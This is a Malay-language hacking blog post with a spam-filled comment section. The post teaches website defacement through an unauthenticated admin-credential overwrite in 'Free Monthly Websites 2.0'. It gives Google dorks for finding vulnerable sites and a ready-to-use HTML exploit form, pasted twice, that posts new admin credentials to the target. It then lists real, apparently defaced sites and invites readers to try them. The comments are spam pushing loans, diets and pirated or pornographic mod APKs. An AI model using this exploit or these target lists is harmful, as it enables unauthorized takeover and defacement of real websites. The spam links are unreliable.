Deface website dengan remote password change
Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit baru iaitu remote administrator password change.Benda apa ni?Exploit ni boleh tukar password dan username pada website yang terdedah secara remote.
Ok jom mula.
1. Mula-mula jadi laman sasaran dengan menggunakan salah satu google dork dibawah :
- inurl:/index_ebay.php
- "Powered by: Resell Rights Fortune"
- Powered By: Free Monthly Websites 2.0
2. Copy script dibawah :
Tukar http://www.target.com/ kepada link laman sasaran yang korang dapat tadi.
<html>
<head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
<body>
<td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
<form name="frm" action="http://www.target.com/admin/file_io.php" method="post" onSubmit="return chk()">
<input type="hidden" name="do_type" value="admin_settings_write">
<tr>
<td height="100" colspan="2" align="center" valign="middle">
<font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
</tr>
<tr>
<td width="300" height="50" align="center" valign="middle">
<font color="#808080">New Username:</font>
</td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td>
</tr>
</td>
<tr>
<td width="300" height="62" align="center" valign="middle">
<font color="#808080">New Password: </font> </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" ><p>
<input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
</td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
<a href="http://www.y-aboukir.info/" style="text-decoration: none">
<font color="#000000">Yassin ABOUKIR</font></a></p></td>
</tr>
</body>
<html>
<head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
<body>
<td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
<form name="frm" action="http://www.target.com/admin/file_io.php" method="post" onSubmit="return chk()">
<input type="hidden" name="do_type" value="admin_settings_write">
<tr>
<td height="100" colspan="2" align="center" valign="middle">
<font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
</tr>
<tr>
<td width="300" height="50" align="center" valign="middle">
<font color="#808080">New Username:</font>
</td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td>
</tr>
</td>
<tr>
<td width="300" height="62" align="center" valign="middle">
<font color="#808080">New Password: </font> </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" ><p>
<input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
</td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
<a href="http://www.y-aboukir.info/" style="text-decoration: none">
<font color="#000000">Yassin ABOUKIR</font></a></p></td>
</tr>
</body>
<html>
Save sebagai exploit.html .
3. Selepas itu, buka script yang korang save tadi dalam browser korang. (right click > open with > browser)
Isikan kotak New Username dan New Password dengan apa2 yang korang suka.Username dan Password yang korang isi ni akan digunakan untuk login di website sasaran korang.
Selepas dah isi, click Save dan kalau berjaya korang akan di redirect ke login page website sasaran korang tadi :D
Apa yang korang perlu buat seterusnya ialah Login dengan username dan password yang korang buat tadi!
Kalau tak berjaya, akan keluar :
The file settings/admin_settings.txt is not writable
Lepas dah berjaya login, korang boleh la deface :D
Ni contoh website yang aku dapat :
http://www.jerry-lyons.com/page.php?id=Top_Reasons.html
http://zone-h.org/mirror/id/19689275
http://www.windowmagic.co/
http://zone-h.org/mirror/id/19689294
Korang boleh la mencuba dengan website2 ni.Happy defacing!
I'm excited to uncover this site. I want to to thank you for ones time just for this fantastic read!! I definitely enjoyed every bit of it and I have you book-marked to check out new things on your site.
ReplyDeletemy site: cash Loan fast
Τhеre аre pleasant discussions regardіng this edіtorial at
ReplyDeletethis place at this blog, I have read аll that, so at this time me also сommеntіng herе.
Check out mу webpage: bad credit debt consolidation loan
This artiсle gives а cleaг іdеa іn support
ReplyDeleteof the ѵіѕіtoгs ωhо aгe
into blοggіng, that truly how to dο blogging
and sitе-building.
Αlso vіsit my homeρage; unsecured loans poor credit
If you could do something you never ԁiԁ before ωοulԁ you?
ReplyDeleteI mеan writing аbοut "Free Monthly Websites 2.0 Administrator Remote Password Change" іs gooԁ but is it a safe
subject сonsideгіng your webpage іѕ about
imрlants? Αll things consideгed it is
a great poѕt however I bet уou could try
branching into other subjeсts like implаnts for eхamplе.
Just аn idеa... I hope you don't mind me saying that.
my blog hcg diet drops
Very nice post. I certainly appreciate this site. Continue the good
ReplyDeletework!
Feel free to visit my web page :: what is seo
I am not sure if уou aгe aware of this. I read а page just like "Free Monthly Websites 2.0 Administrator Remote Password Change" the other ԁay on .
ReplyDelete.. oh I can't remember the internet-site just now but it was also about implantable collamer lens too. I will get back to you if it comes to me.
Feel free to visit my web page: fortune teller melbourne
I do not even know the way I ended up here, but I thought this put up
ReplyDeletewas once good. I don't realize who you might be however definitely you are going to a famous blogger for those who aren't already.
Cheers!
My blog ... Tinitis
Ӏ wіsh I сould wrіte likе you.
ReplyDeleteΥour piеce οf writing "Free Monthly Websites 2.0 Administrator Remote Password Change" haѕ pushed me to get
off my butt and get ѕome ωorԁ out tο the worlԁ.
Υоu have bοoѕteԁ my сonfidence ϳuѕt by writing ѕo well.
Feel fгee to vіsit my page; free tarot reading online
Thank you for the good writeup. It in fact was a amusement account it.
ReplyDeleteLook advanced to far added agreeable from you! However, how could we communicate?
my page new cellulite treatment
I don't know if it's just me or if everybody else encountering issues with
ReplyDeleteyour site. It seems like some of the text within your posts are running off the screen.
Can someone else please provide feedback and let me know if this is happening to them as
well? This may be a problem with my internet browser because I've had this happen previously. Many thanks
Also visit my blog post ... new cellulite treatment
It's the best time to make some plans for the future and it's time to be happy.
ReplyDeleteI have read this post and if I could I desire to suggest you few interesting things or tips.
Perhaps you could write next articles referring to this article.
I desire to read more things about it!
my webpage: free poker games downloads
Thаnk you for the gοоd ωriteup.
ReplyDeleteӏt in truth was a amusement account іt. Lоok advanced to far deliѵeгed agrеeаble from you!
However, how could ωe keep up a cοrrespondence?
Feel free to visit mу blog post: http://www.ftp3.org/JefferyClouter
Very Nice Post, I learned a lot through it. Thanks for posting. Thank you!! For sharing this amazing article with details.
ReplyDeleteI bookmarked your site for the further update.
Here My website to
Pornhub MOD APK modyolo
Beard Photo Editor Premium MOD Download Full
Momix Premium Mod APK Latest mod DOWNLOAD
Resso Premium Mod Apk Mix root mods
evergreen class 9 science social maths pdf DOWNLOAD
the kashmir files movie DOWNLOAD
atgflix
apksafe